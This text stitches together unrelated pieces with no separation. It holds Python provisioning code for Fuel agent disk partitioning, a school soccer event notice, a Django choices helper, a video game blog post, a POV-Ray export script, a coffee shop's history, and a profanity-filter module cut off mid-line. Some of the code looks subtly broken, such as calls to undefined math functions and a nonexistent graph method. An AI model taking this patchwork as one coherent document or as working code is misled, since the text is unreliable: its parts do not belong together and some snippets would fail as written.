# Copyright 2014 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import math from fuel_agent.drivers import ks_spaces_validator from fuel_agent import errors from fuel_agent import objects from fuel_agent.openstack.common import log as logging from fuel_agent.utils import hardware_utils as hu LOG = logging.getLogger(__name__) def match_device(hu_disk, ks_disk): """Tries to figure out if hu_disk got from hu.list_block_devices and ks_spaces_disk given correspond to the same disk device. This is the simplified version of hu.match_device :param hu_disk: A dict representing disk device how it is given by list_block_devices method. :param ks_disk: A dict representing disk device according to ks_spaces format. :returns: True if hu_disk matches ks_spaces_disk else False. """ uspec = hu_disk['uspec'] # True if at least one by-id link matches ks_disk if ('DEVLINKS' in uspec and len(ks_disk.get('extra', [])) > 0 and any(x.startswith('/dev/disk/by-id') for x in set(uspec['DEVLINKS']) & set(['/dev/%s' % l for l in ks_disk['extra']]))): return True # True if one of DEVLINKS matches ks_disk id if (len(ks_disk.get('extra', [])) == 0 and 'DEVLINKS' in uspec and 'id' in ks_disk and '/dev/%s' % ks_disk['id'] in uspec['DEVLINKS']): return True return False class Nailgun(object): def __init__(self, data): # Here data is expected to be raw provisioning data # how it is given by nailgun self.data = data def partition_data(self): return self.data['ks_meta']['pm_data']['ks_spaces'] @property def ks_disks(self): disk_filter = lambda x: x['type'] == 'disk' and x['size'] > 0 return filter(disk_filter, self.partition_data()) @property def ks_vgs(self): vg_filter = lambda x: x['type'] == 'vg' return filter(vg_filter, self.partition_data()) @property def hu_disks(self): """Actual disks which are available on this node it is a list of dicts which are formatted other way than ks_spaces disks. To match both of those formats use _match_device method. """ if not getattr(self, '_hu_disks', None): self._hu_disks = hu.list_block_devices(disks=True) return self._hu_disks def _disk_dev(self, ks_disk): # first we try to find a device that matches ks_disk # comparing by-id and by-path links matched = [hu_disk['device'] for hu_disk in self.hu_disks if match_device(hu_disk, ks_disk)] # if we can not find a device by its by-id and by-path links # we try to find a device by its name fallback = [hu_disk['device'] for hu_disk in self.hu_disks if '/dev/%s' % ks_disk['name'] == hu_disk['device']] found = matched or fallback if not found or len(found) > 1: raise errors.DiskNotFoundError( 'Disk not found: %s' % ks_disk['name']) return found[0] def _getlabel(self, label): if not label: return '' # XFS will refuse to format a partition if the # disk label is > 12 characters. return ' -L {0} '.format(label[:12]) def _get_partition_count(self, name): count = 0 for disk in self.ks_disks: count += len([v for v in disk["volumes"] if v.get('name') == name and v['size'] > 0]) return count def _num_ceph_journals(self): return self._get_partition_count('cephjournal') def _num_ceph_osds(self): return self._get_partition_count('ceph') def partition_scheme(self): LOG.debug('--- Preparing partition scheme ---') data = self.partition_data() ks_spaces_validator.validate(data) partition_scheme = objects.PartitionScheme() ceph_osds = self._num_ceph_osds() journals_left = ceph_osds ceph_journals = self._num_ceph_journals() LOG.debug('Looping over all disks in provision data') for disk in self.ks_disks: LOG.debug('Processing disk %s' % disk['name']) LOG.debug('Adding gpt table on disk %s' % disk['name']) parted = partition_scheme.add_parted( name=self._disk_dev(disk), label='gpt') # we install bootloader on every disk LOG.debug('Adding bootloader stage0 on disk %s' % disk['name']) parted.install_bootloader = True # legacy boot partition LOG.debug('Adding bios_grub partition on disk %s: size=24' % disk['name']) parted.add_partition(size=24, flags=['bios_grub']) # uefi partition (for future use) LOG.debug('Adding UEFI partition on disk %s: size=200' % disk['name']) parted.add_partition(size=200) LOG.debug('Looping over all volumes on disk %s' % disk['name']) for volume in disk['volumes']: LOG.debug('Processing volume: ' 'name=%s type=%s size=%s mount=%s vg=%s' % (volume.get('name'), volume.get('type'), volume.get('size'), volume.get('mount'), volume.get('vg'))) if volume['size'] <= 0: LOG.debug('Volume size is zero. Skipping.') continue if volume.get('name') == 'cephjournal': LOG.debug('Volume seems to be a CEPH journal volume. ' 'Special procedure is supposed to be applied.') # We need to allocate a journal partition for each ceph OSD # Determine the number of journal partitions we need on # each device ratio = math.ceil(float(ceph_osds) / ceph_journals) # No more than 10GB will be allocated to a single journal # partition size = volume["size"] / ratio if size > 10240: size = 10240 # This will attempt to evenly spread partitions across # multiple devices e.g. 5 osds with 2 journal devices will # create 3 partitions on the first device and 2 on the # second if ratio < journals_left: end = ratio else: end = journals_left for i in range(0, end): journals_left -= 1 if volume['type'] == 'partition': LOG.debug('Adding CEPH journal partition on ' 'disk %s: size=%s' % (disk['name'], size)) prt = parted.add_partition(size=size) LOG.debug('Partition name: %s' % prt.name) if 'partition_guid' in volume: LOG.debug('Setting partition GUID: %s' % volume['partition_guid']) prt.set_guid(volume['partition_guid']) continue if volume['type'] in ('partition', 'pv', 'raid'): LOG.debug('Adding partition on disk %s: size=%s' % (disk['name'], volume['size'])) prt = parted.add_partition(size=volume['size']) LOG.debug('Partition name: %s' % prt.name) if volume['type'] == 'partition': if 'partition_guid' in volume: LOG.debug('Setting partition GUID: %s' % volume['partition_guid']) prt.set_guid(volume['partition_guid']) if 'mount' in volume and volume['mount'] != 'none': LOG.debug('Adding file system on partition: ' 'mount=%s type=%s' % (volume['mount'], volume.get('file_system', 'xfs'))) partition_scheme.add_fs( device=prt.name, mount=volume['mount'], fs_type=volume.get('file_system', 'xfs'), fs_label=self._getlabel(volume.get('disk_label'))) if volume['type'] == 'pv': LOG.debug('Creating pv on partition: pv=%s vg=%s' % (prt.name, volume['vg'])) lvm_meta_size = volume.get('lvm_meta_size', 64) # The reason for that is to make sure that # there will be enough space for creating logical volumes. # Default lvm extension size is 4M. Nailgun volume # manager does not care of it and if physical volume size # is 4M * N + 3M and lvm metadata size is 4M * L then only # 4M * (N-L) + 3M of space will be available for # creating logical extensions. So only 4M * (N-L) of space # will be available for logical volumes, while nailgun # volume manager might reguire 4M * (N-L) + 3M # logical volume. Besides, parted aligns partitions # according to its own algorithm and actual partition might # be a bit smaller than integer number of mebibytes. if lvm_meta_size < 10: raise errors.WrongPartitionSchemeError( 'Error while creating physical volume: ' 'lvm metadata size is too small') metadatasize = int(math.floor((lvm_meta_size - 8) / 2)) metadatacopies = 2 partition_scheme.vg_attach_by_name( pvname=prt.name, vgname=volume['vg'], metadatasize=metadatasize, metadatacopies=metadatacopies) if volume['type'] == 'raid': if 'mount' in volume and volume['mount'] != 'none': LOG.debug('Attaching partition to RAID ' 'by its mount point %s' % volume['mount']) partition_scheme.md_attach_by_mount( device=prt.name, mount=volume['mount'], fs_type=volume.get('file_system', 'xfs'), fs_label=self._getlabel(volume.get('disk_label'))) # this partition will be used to put there configdrive image if partition_scheme.configdrive_device() is None: LOG.debug('Adding configdrive partition on disk %s: size=20' % disk['name']) parted.add_partition(size=20, configdrive=True) LOG.debug('Looping over all volume groups in provision data') for vg in self.ks_vgs: LOG.debug('Processing vg %s' % vg['id']) LOG.debug('Looping over all logical volumes in vg %s' % vg['id']) for volume in vg['volumes']: LOG.debug('Processing lv %s' % volume['name']) if volume['size'] <= 0: LOG.debug('Lv size is zero. Skipping.') continue if volume['type'] == 'lv': LOG.debug('Adding lv to vg %s: name=%s, size=%s' % (vg['id'], volume['name'], volume['size'])) lv = partition_scheme.add_lv(name=volume['name'], vgname=vg['id'], size=volume['size']) if 'mount' in volume and volume['mount'] != 'none': LOG.debug('Adding file system on lv: ' 'mount=%s type=%s' % (volume['mount'], volume.get('file_system', 'xfs'))) partition_scheme.add_fs( device=lv.device_name, mount=volume['mount'], fs_type=volume.get('file_system', 'xfs'), fs_label=self._getlabel(volume.get('disk_label'))) LOG.debug('Appending kernel parameters: %s' % self.data['ks_meta']['pm_data']['kernel_params']) partition_scheme.append_kernel_params( self.data['ks_meta']['pm_data']['kernel_params']) return partition_scheme def configdrive_scheme(self): LOG.debug('--- Preparing configdrive scheme ---') data = self.data configdrive_scheme = objects.ConfigDriveScheme() LOG.debug('Adding common parameters') admin_interface = filter( lambda x: (x['mac_address'] == data['kernel_options']['netcfg/choose_interface']), [dict(name=name, **spec) for name, spec in data['interfaces'].iteritems()])[0] ssh_auth_keys = data['ks_meta']['authorized_keys'] if data['ks_meta']['auth_key']: ssh_auth_keys.append(data['ks_meta']['auth_key']) configdrive_scheme.set_common( ssh_auth_keys=ssh_auth_keys, hostname=data['hostname'], fqdn=data['hostname'], name_servers=data['name_servers'], search_domain=data['name_servers_search'], master_ip=data['ks_meta']['master_ip'], master_url='http://%s:8000/api' % data['ks_meta']['master_ip'], udevrules=data['kernel_options']['udevrules'], admin_mac=data['kernel_options']['netcfg/choose_interface'], admin_ip=admin_interface['ip_address'], admin_mask=admin_interface['netmask'], admin_iface_name=admin_interface['name'], timezone=data['ks_meta'].get('timezone', 'America/Los_Angeles'), ks_repos=dict(map(lambda x: x.strip('"').strip("'"), item.split('=')) for item in data['ks_meta']['repo_metadata'].split(',')) ) LOG.debug('Adding puppet parameters') configdrive_scheme.set_puppet( master=data['ks_meta']['puppet_master'], enable=data['ks_meta']['puppet_enable'] ) LOG.debug('Adding mcollective parameters') configdrive_scheme.set_mcollective( pskey=data['ks_meta']['mco_pskey'], vhost=data['ks_meta']['mco_vhost'], host=data['ks_meta']['mco_host'], user=data['ks_meta']['mco_user'], password=data['ks_meta']['mco_password'], connector=data['ks_meta']['mco_connector'], enable=data['ks_meta']['mco_enable'] ) LOG.debug('Setting configdrive profile %s' % data['profile']) configdrive_scheme.set_profile(profile=data['profile']) return configdrive_scheme def image_scheme(self, partition_scheme): LOG.debug('--- Preparing image scheme ---') data = self.data image_scheme = objects.ImageScheme() # We assume for every file system user may provide a separate # file system image. For example if partitioning scheme has # /, /boot, /var/lib file systems then we will try to get images # for all those mount points. Images data are to be defined # at provision.json -> ['ks_meta']['image_data'] LOG.debug('Looping over all file systems in partition scheme') for fs in partition_scheme.fss: LOG.debug('Processing fs %s' % fs.mount) if fs.mount not in data['ks_meta']['image_data']: LOG.debug('There is no image for fs %s. Skipping.' % fs.mount) continue image_data = data['ks_meta']['image_data'][fs.mount] LOG.debug('Adding image for fs %s: uri=%s format=%s container=%s' % (fs.mount, image_data['uri'], image_data['format'], image_data['container'])) image_scheme.add_image( uri=image_data['uri'], target_device=fs.device, # In the future we will get format and container # from provision.json, but currently it is hard coded. format=image_data['format'], container=image_data['container'], ) return image_scheme
The Hahnville High School Soccer team is sponsoring “Future Tiger Night” when the Tiger’s host Destrehan in some key District matches on Friday January 25, 2008 at HHS. There will be three games this evening. The HHS girls begin at 5 p.m., with the Varsity Boy’s starting at approximately 6:30 and the Boy’s Junior Varsity will follow. Any Youth player who wears there soccer uniform jersey will be admitted into the game at “No Charge.” Any one accompanying the “Future Tiger” will be charged admission. The HHS soccer booster club will also salute the senior players at there final regular season home game.
class Choices(object): """ A class to encapsulate handy functionality for lists of choices for a Django model field. Each argument to ``Choices`` is a choice, represented as either a string, a two-tuple, or a three-tuple. If a single string is provided, that string is used as the database representation of the choice as well as the human-readable presentation. If a two-tuple is provided, the first item is used as the database representation and the second the human-readable presentation. If a triple is provided, the first item is the database representation, the second a valid Python identifier that can be used as a readable label in code, and the third the human-readable presentation. This is most useful when the database representation must sacrifice readability for some reason: to achieve a specific ordering, to use an integer rather than a character field, etc. Regardless of what representation of each choice is originally given, when iterated over or indexed into, a ``Choices`` object behaves as the standard Django choices list of two-tuples. If the triple form is used, the Python identifier names can be accessed as attributes on the ``Choices`` object, returning the database representation. (If the single or two-tuple forms are used and the database representation happens to be a valid Python identifier, the database representation itself is available as an attribute on the ``Choices`` object, returning itself.) """ def __init__(self, *choices): self._full = [] self._choices = [] self._choice_dict = {} for choice in self.equalize(choices): self._full.append(choice) self._choices.append((choice[0], choice[2])) self._choice_dict[choice[1]] = choice[0] def equalize(self, choices): for choice in choices: if isinstance(choice, (list, tuple)): if len(choice) == 3: yield choice elif len(choice) == 2: yield (choice[0], choice[0], choice[1]) else: raise ValueError("Choices can't handle a list/tuple of length %s, only 2 or 3" % len(choice)) else: yield (choice, choice, choice) def __len__(self): return len(self._choices) def __iter__(self): return iter(self._choices) def __getattr__(self, attname): try: return self._choice_dict[attname] except KeyError: raise AttributeError(attname) def __getitem__(self, index): return self._choices[index] def __repr__(self): return '%s(%s)' % (self.__class__.__name__, ', '.join(("%s" % str(i) for i in self._full)))
Hey, a new Rollercoaster Tycoon game got shown off properly for the first time today! Remember Rollercoaster Tycoon, and how good it was 10, 15 years ago? Keep remembering, because this one looks like hell. I mean that in the most literal sense. For all I know this could be the most enjoyable Rollercoaster Tycoon game ever made once you sit down and play around with it. For now, though, *whistles*. This is a PC game. I think Davy speaks for all of us. Though with the game out in just a few months, I wouldn't hold your breath. This blowback follows on from last year's Rollercoaster Tycoon game, which was also not a fan favourite.
## {{{ http://code.activestate.com/recipes/205451/ (r1) import sys, os import numpy as np import networkx as nx #from pygraph.classes.graph import graph #from pygraph.algorithms.accessibility import connected_components class File: def __init__(self,fnam="out.pov",*items): self.file = open(fnam,"w") self.__indent = 0 self.write(*items) def include(self,name): self.writeln( '#include "%s"'%name ) self.writeln() def indent(self): self.__indent += 1 def dedent(self): self.__indent -= 1 assert self.__indent >= 0 def block_begin(self): self.writeln( "{" ) self.indent() def block_end(self): self.dedent() self.writeln( "}" ) if self.__indent == 0: # blank line if this is a top level end self.writeln( ) def write(self,*items): for item in items: if type(item) == str: self.include(item) else: item.write(self) def writeln(self,s=""): #print " "*self.__indent+s self.file.write(" "*self.__indent+s+os.linesep) class Vector: def __init__(self,*args): if len(args) == 1: self.v = args[0] else: self.v = args def __str__(self): return "<%s>"%(", ".join([str(x)for x in self.v])) def __repr__(self): return "Vector(%s)"%self.v def __mul__(self,other): return Vector( [r*other for r in self.v] ) def __rmul__(self,other): return Vector( [r*other for r in self.v] ) class Item: def __init__(self,name,args=[],opts=[],**kwargs): self.name = name args=list(args) for i in range(len(args)): if type(args[i]) == tuple or type(args[i]) == list: args[i] = Vector(args[i]) self.args = args self.opts = opts self.kwargs=kwargs def append(self, item): self.opts.append( item ) def write(self, file): file.writeln( self.name ) file.block_begin() if self.args: file.writeln( ", ".join([str(arg) for arg in self.args]) ) for opt in self.opts: if hasattr(opt,"write"): opt.write(file) else: file.writeln( str(opt) ) for key,val in list(self.kwargs.items()): if type(val)==tuple or type(val)==list: val = Vector(*val) file.writeln( "%s %s"%(key,val) ) else: file.writeln( "%s %s"%(key,val) ) file.block_end() def __setattr__(self,name,val): self.__dict__[name]=val if name not in ["kwargs","args","opts","name"]: self.__dict__["kwargs"][name]=val def __setitem__(self,i,val): if i < len(self.args): self.args[i] = val else: i += len(args) if i < len(self.opts): self.opts[i] = val def __getitem__(self,i,val): if i < len(self.args): return self.args[i] else: i += len(args) if i < len(self.opts): return self.opts[i] class Texture(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"texture",(),opts,**kwargs) class Pigment(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"pigment",(),opts,**kwargs) class Finish(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"finish",(),opts,**kwargs) class Normal(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"normal",(),opts,**kwargs) class Camera(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"camera",(),opts,**kwargs) class LightSource(Item): def __init__(self,v,*opts,**kwargs): Item.__init__(self,"light_source",(Vector(v),),opts,**kwargs) class Background(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"background",(),opts,**kwargs) class Box(Item): def __init__(self,v1,v2,*opts,**kwargs): #self.v1 = Vector(v1) #self.v2 = Vector(v2) Item.__init__(self,"box",(v1,v2),opts,**kwargs) class Cylinder(Item): def __init__(self,v1,v2,r,*opts,**kwargs): " opts: open " Item.__init__(self,"cylinder",(v1,v2,r),opts,**kwargs) class Plane(Item): def __init__(self,v,r,*opts,**kwargs): Item.__init__(self,"plane",(v,r),opts,**kwargs) class Torus(Item): def __init__(self,r1,r2,*opts,**kwargs): Item.__init__(self,"torus",(r1,r2),opts,**kwargs) class Cone(Item): def __init__(self,v1,r1,v2,r2,*opts,**kwargs): " opts: open " Item.__init__(self,"cone", (v1,r1,v2,r2),opts,**kwargs) class Sphere(Item): def __init__(self,v,r,*opts,**kwargs): Item.__init__(self,"sphere",(v,r),opts,**kwargs) class Union(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"union",(),opts,**kwargs) class Intersection(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"intersection",(),opts,**kwargs) class Difference(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"difference",(),opts,**kwargs) class Merge(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"merge",(),opts,**kwargs) class Mesh2(Item): class VertexVectors(Item): def __init__(self,vertex,*opts,**kwargs): Item.__init__(self, "vertex_vectors", (len(vertex), *map(Vector, vertex)), opts,**kwargs) class FaceIndices(Item): def __init__(self,faces,*opts,**kwargs): Item.__init__(self, "face_indices", (len(faces), *map(Vector, faces)), opts,**kwargs) class VertexNormals(Item): def __init__(self,faces,*opts, **kwargs): Item.__init__(self, "normal_vectors", (len(faces), *map(Vector, faces)), opts,**kwargs) def __init__(self,vertex,faces,*opts, normals=None,**kwargs): if normals is None: Item.__init__(self, "mesh2", (), (self.VertexVectors(vertex), self.FaceIndices(faces), *opts), **kwargs) else: Item.__init__(self, "mesh2", (), (self.VertexVectors(vertex), self.VertexNormals(normals), self.FaceIndices(faces), *opts), **kwargs) x = Vector(1,0,0) y = Vector(0,1,0) z = Vector(0,0,1) white = Texture(Pigment(color=(1,1,1))) def tutorial31(): " from the povray tutorial sec. 3.1" file=File("demo.pov","colors.inc","stones.inc") cam = Camera(location=(0,2,-3),look_at=(0,1,2)) sphere = Sphere( (0,1,2), 2, Texture(Pigment(color="Yellow"))) light = LightSource( (2,4,-3), color="White") file.write( cam, sphere, light ) def spiral(): " Fibonacci spiral " gamma = (sqrt(5)-1)/2 file = File() Camera(location=(0,0,-128), look_at=(0,0,0)).write(file) LightSource((100,100,-100), color=(1,1,1)).write(file) LightSource((150,150,-100), color=(0,0,0.3)).write(file) LightSource((-150,150,-100), color=(0,0.3,0)).write(file) LightSource((150,-150,-100), color=(0.3,0,0)).write(file) theta = 0.0 for i in range(200): r = i * 0.5 color = 1,1,1 v = [ r*sin(theta), r*cos(theta), 0 ] Sphere( v, 0.7*sqrt(i), Texture( Finish( ambient = 0.0, diffuse = 0.0, reflection = 0.85, specular = 1 ), Pigment(color=color)) ).write(file) theta += gamma * 2 * pi ## end of http://code.activestate.com/recipes/205451/ }}} def exportPOV( path = '/mnt/htw20/Documents/data/retrack/go/1/', head = 'J1_thr0_radMin3.1_radMax0_6min', tail = '_t000', out = '/home/mathieu/Documents/Thesis/data/go/1/mrco_ico.pov', ico_thr = -0.027, zmin = 100, zmax = 175, header = 'go1.inc', polydisperse = False ): if polydisperse: positions = np.load(path+head+tail+'.npy') radii = positions[:,-2]*np.sqrt(2) positions = positions[:,:-2] else: positions = np.loadtxt(path+head+tail+'.dat', skiprows=2) Q6 = np.loadtxt(path+head+'_space'+tail+'.cloud', usecols=[1]) bonds = np.loadtxt(path+head+tail+'.bonds', dtype=int) q6, w6 = np.loadtxt(path+head+tail+'.cloud', usecols=[1,5], unpack=True) u6 = ((2*6+1)/(4.0*np.pi))**1.5 * w6 * q6**3 ico_bonds = np.bitwise_and( u6[bonds].min(axis=-1)<ico_thr, np.bitwise_and( positions[:,-1][bonds].min(axis=-1)<zmax, positions[:,-1][bonds].max(axis=-1)>zmin ) ) ico = np.unique(bonds[ico_bonds]) mrco = np.unique(bonds[np.bitwise_and( Q6[bonds].max(axis=-1)>0.25, np.bitwise_and( positions[:,-1][bonds].min(axis=-1)<zmax, positions[:,-1][bonds].max(axis=-1)>zmin ) )]) gr = nx.Graph() gr.add_nodes(ico) for a,b in bonds[ico_bonds]: gr.add_edge((a,b)) try: cc = nx.connected_components(gr) except RuntimeError: print("Graph is too large for ico_thr=%g, lower the threshold."%ico_thr) return #remove clusters than contain less than 10 particles ## sizes = np.zeros(max(cc.values()), int) ## for p,cl in cc.iteritems(): ## sizes[cl-1] +=1 ## cc2 = dict() ## for p,cl in cc.iteritems(): ## if sizes[cl-1]>9: ## cc2[p] = cl ## cc =cc2 if polydisperse: pov_mrco = [ Sphere((x,y,z), r) for x,y,z,r in np.column_stack((positions,radii))[np.setdiff1d(mrco, ico)] ] else: pov_mrco = [ Sphere((x,y,z), 6) for x,y,z in positions[np.setdiff1d(mrco, ico)] ] pov_mrco = Union(*pov_mrco + [Texture(Pigment(color="Green"))]) if polydisperse: pov_ico = [ Sphere( tuple(positions[p].tolist()), radii[p], Texture(Pigment(color="COLORSCALE(%f)"%(cl*120.0/max(cc.values())))) ) for p, cl in cc.items()] else: pov_ico = [ Sphere( tuple(positions[p].tolist()), 6, Texture(Pigment(color="COLORSCALE(%f)"%(cl*120.0/max(cc.values())))) ) for p, cl in cc.items()] pov_ico = Union(*pov_ico) f = File(out, "colors.inc", header) f.write(pov_mrco, pov_ico) f.file.flush()
Stay tuned — we’re updating this section soon! The doors at Savaya Coffee Market were officially opened April 7, 2009. The shop, located in the middle of the William’s Center Shopping Plaza, was outfitted with equipment though not aesthetically complete on the day of opening. None the less, teacher and entrepreneur, Burc Maruflu, greeted firsttime customers with a smile. In the following months, Savaya Coffee Market continued to develop its look and personality: The shop came to life with notable murals painted by local artist Jos Villabrille, a long mesquite-wood bar was installed and a six panel chalk board was mounted over the bar. A coffee hobbyist for years, Burc has pursued quality coffee with a passion for the excellent cup. His enthusiasm and love of coffee is exuded through Savaya Coffee Market. Over the past years, Savaya has become a gathering place for people with the common interest of drinking great coffee. What could be better than fantastic coffee in the company of friends?
# -*- coding: utf-8 -*- # Author: masteroncluster@gmail.com # Py-Censure is an obscene words detector/replacer for Russian / English languages # Russian patterns are from PHP-Matotest, http://php-matotest.sourceforge.net/, # that was written by Scarab # Ported to Python by Master.Cluster <masteroncluster@gmail.com>, 2010, 2016 # English patters are adapted from http://www.noswearing.com/dictionary/ from __future__ import unicode_literals, print_function import re from copy import deepcopy from importlib import import_module from .lang.common import patterns, constants def _get_token_value(token): return token.value def _get_remained_tokens(tags_list): if not tags_list: return '', '' # pre, post pre = [] post = [] body_pre = [] body_post = [] word_started = word_ended = False # <a><b>wo</b>rd<i> here</i><img><span>End</span> while len(tags_list): # pre and body tag = tags_list.pop(0) if tag.token_type == 'w': word_started = True if word_started: if tag.token_type in 'to tc ts': body_pre.append(tag) else: pre.append(tag) # post if len(tags_list): tag = tags_list.pop(-1) if tag.token_type == 'w': word_ended = True if word_ended: if tag.token_type in 'to tc ts': body_post.insert(0, tag) else: post.insert(0, tag) body_tags = body_pre + body_post while len(body_tags): tag = body_tags.pop(0) if tag.token_type == 'sp': # Do we need that tags? continue elif tag.token_type == 'tc': # can find in pre or in body open_tags = [x for x in pre if x.tag == tag.tag and x.token_type == 'to'] if len(open_tags): pre.remove(open_tags[0]) continue else: # can be in body close_tags = [x for x in body_tags if x.tag == tag.tag and x.token_type == 'tc'] if len(close_tags): body_tags.remove(close_tags[0]) continue # can find in post close_tags = [x for x in post if x.tag == tag.tag and x.token_type == 'tc'] if len(close_tags): post.remove(close_tags[0]) continue return ''.join(map(_get_token_value, pre + body_tags)), ''.join(map(_get_token_value, post)) class Token(object): def __init__(self, value=None, token_type=None): head = value.split(' ', 1) # splits if len(head) == 1: # simple tag i.e <h1>, </i> head = head[0][1:-1].lower() # need to cut last '>' symbol else: # complex tag with inner params i.e <input type=...> head = head[0].lower()[1:] if not token_type: token_type = 'to' # open type ie <a...> # should derive from value if head[0] == '/': head = head[1:] token_type = 'tc' # close type ie </a> elif value[-2] == '/': token_type = 'ts' # self-closed type ie <img .../> if token_type in 'to tc ts' and \ re.match(patterns.PAT_HTML_SPACE, value): # token_type != w aka word token_type = 'sp' # this is SPACER!!! self.value = value self.token_type = token_type # w - word(part of), t - tag, s - spacer, o - o self.tag = head self.token_type = token_type def __repr__(self): return 'Token({}) {} {}'.format(self.value, self.tag, self.token_type) # .encode('utf-8') class CensorException(Exception): pass class CensorBase: lang = 'ru' def __init__(self, do_compile=True): self.lang_lib = import_module('censure.lang.{}'.format(self.lang)) if do_compile: # patterns will be pre-compiled, so we need to copy them def prep_var(v): return deepcopy(v) else: def prep_var(v): return v # language-related constants data loading and preparations self.bad_phrases = prep_var(self.lang_lib.constants.BAD_PHRASES) self.bad_semi_phrases = prep_var(self.lang_lib.constants.BAD_SEMI_PHRASES) self.excludes_data = prep_var(self.lang_lib.constants.EXCLUDES_DATA) self.excludes_core = prep_var(self.lang_lib.constants.EXCLUDES_CORE) self.foul_data = prep_var(self.lang_lib.constants.FOUL_DATA) self.foul_core = prep_var(self.lang_lib.constants.FOUL_CORE) self.do_compile = do_compile if do_compile: self._compile() # will compile patterns def _compile(self): """ For testing functional and finding regexp rules, under which the word falls, disable call for this function (in __init__) by specifying do_compile=False to __init__, then debug, fix bad rule and then use do_compile=True again """ for attr in ('excludes_data', 'excludes_core', 'foul_data', 'foul_core', 'bad_semi_phrases', 'bad_phrases'): obj = getattr(self, attr) if isinstance(obj, dict): for (k, v) in obj.items(): # safe cause of from __future__ import unicode_literals if isinstance(v, "".__class__): obj[k] = re.compile(v) else: obj[k] = tuple((re.compile(v[i]) for i in range(0, len(v)))) setattr(self, attr, obj) else: new_obj = [] for i in range(0, len(obj)): new_obj.append(re.compile(obj[i])) setattr(self, attr, new_obj) def check_line(self, line): line_info = {'is_good': True} words = self._split_line(line) # Checking each word in phrase line, if found any foul word, # we think that all phrase line is bad if words: for word in words: word_info = self.check_word(word) if not word_info['is_good']: line_info.update({ 'is_good': False, 'bad_word_info': word_info }) break if line_info['is_good']: phrases_info = self.check_line_bad_phrases(line) if not phrases_info['is_good']: line_info.update(phrases_info) return line_info def check_line_bad_phrases(self, line): line_info = self._get_word_info(line) self._check_regexps(self.bad_phrases, line_info) line_info.pop('word') # not the word but the line return line_info def _split_line(self, line): raise CensorException('Not implemented in CensorBase') def _prepare_word(self, word): if not self._is_pi_or_e_word(word): word = re.sub(patterns.PAT_PUNCT3, '', word) word = word.lower() for pat, rep in self.lang_lib.patterns.PATTERNS_REPLACEMENTS: word = re.sub(pat, rep, word) # replace similar symbols from another charsets with russian chars word = word.translate(self.lang_lib.constants.TRANS_TAB) # deduplicate chars word = self._remove_duplicates(word) return word @staticmethod def _get_word_info(word): return { 'is_good': True, 'word': word, 'accuse': [], 'excuse': [] } def check_word(self, word, html=False): word = self._prepare_word(word) word_info = self._get_word_info(word) # Accusing word fl = word[:1] # first_letter if fl in self.foul_data: self._check_regexps(self.foul_data[fl], word_info) if word_info['is_good']: # still good, more accuse checks self._check_regexps(self.foul_core, word_info) if word_info['is_good']: # still good, more accuse checks self._check_regexps(self.bad_semi_phrases, word_info) # Excusing word if not word_info['is_good']: self._check_regexps(self.excludes_core, word_info, accuse=False) # excusing if not word_info['is_good'] and fl in self.excludes_data: self._check_regexps(self.excludes_data[fl], word_info, accuse=False) # excusing return word_info @staticmethod def _is_pi_or_e_word(word): if '2.72' in word or '3.14' in word: return True return False def clean_line(self, line, beep=constants.BEEP): bad_words_count = 0 words = re.split(patterns.PAT_SPACE, line) for word in words: word_info = self.check_word(word) if not word_info['is_good']: bad_words_count += 1 line = line.replace(word, beep, 1) bad_phrases_count = 0 line_info = self.check_line_bad_phrases(line) if not line_info['is_good']: for pat in line_info['accuse']: line2 = re.sub(pat, beep, line) if line2 != line: bad_phrases_count += 1 line = line2 return line, bad_words_count, bad_phrases_count def clean_html_line(self, line, beep=constants.BEEP_HTML): bad_words_count = start = 0 tokens = [] for tag in re.finditer(patterns.PAT_HTML_TAG, line): # iter over tags text = line[start:tag.start()] # find spaces in text spacers = re.finditer(patterns.PAT_SPACE, text) spacer_start = 0 for spacer_tag in spacers: word = text[spacer_start:spacer_tag.start()] if word: tokens.append(Token(token_type='w', value=word)) tokens.append(Token(token_type='sp', value=spacer_tag.group())) spacer_start = spacer_tag.end() word = text[spacer_start:] if word: tokens.append(Token(token_type='w', value=word)) start = tag.end() tokens.append(Token(value=tag.group())) word = line[start:] # LAST prep if word: tokens.append(Token(token_type='w', value=word)) current_word = current_tagged_word = '' result = '' tagged_word_list = [] def process_spacer(cw, ctw, twl, r, bwc, tok=None): if cw and not self.is_word_good(cw, html=True): # Here we must find pre and post badword tags to add in result, # ie <h1><b>BAD</b> -> <h1> must remain pre, post = _get_remained_tokens(twl) # bad word r += pre + beep + post bwc += 1 else: # good word r += ctw twl = [] cw = ctw = '' if tok: r += tok.value return cw, ctw, twl, r, bwc for token in tokens: if token.token_type in 'to tc ts': tagged_word_list.append(token) current_tagged_word += token.value elif token.token_type == 'w': tagged_word_list.append(token) current_tagged_word += token.value current_word += token.value else: # spacer here current_word, current_tagged_word, tagged_word_list, result, bad_words_count = \ process_spacer(current_word, current_tagged_word, tagged_word_list, result, bad_words_count, tok=token) if current_word: current_word, current_tagged_word, tagged_word_list, result, bad_words_count = \ process_spacer( current_word, current_tagged_word, tagged_word_list, result, bad_words_count, tok=None) return result, bad_words_count def is_word_good(self, word, html=True): word_info = self.check_word(word, html=html) return word_info['is_good'] def _get_rule(self, rule): if not self.do_compile: return rule else: return '{} {}'.format( rule, 'If you want to see string-value of regexp, ' 'init with do_compile=False for debug' ) @staticmethod def _remove_duplicates(word): buf = prev_char = '' count = 1 # can be <3 for char in word: if char == prev_char: count += 1 if count < 3: buf += char # else skip this char, so AAA -> AA, BBBB -> BB, but OO -> OO, and so on else: count = 1 buf += char prev_char = char return buf def _check_regexps(self, regexps, word_info, accuse=True, break_on_first=True): keys = None # assuming list regexps here if isinstance(regexps, dict): keys = 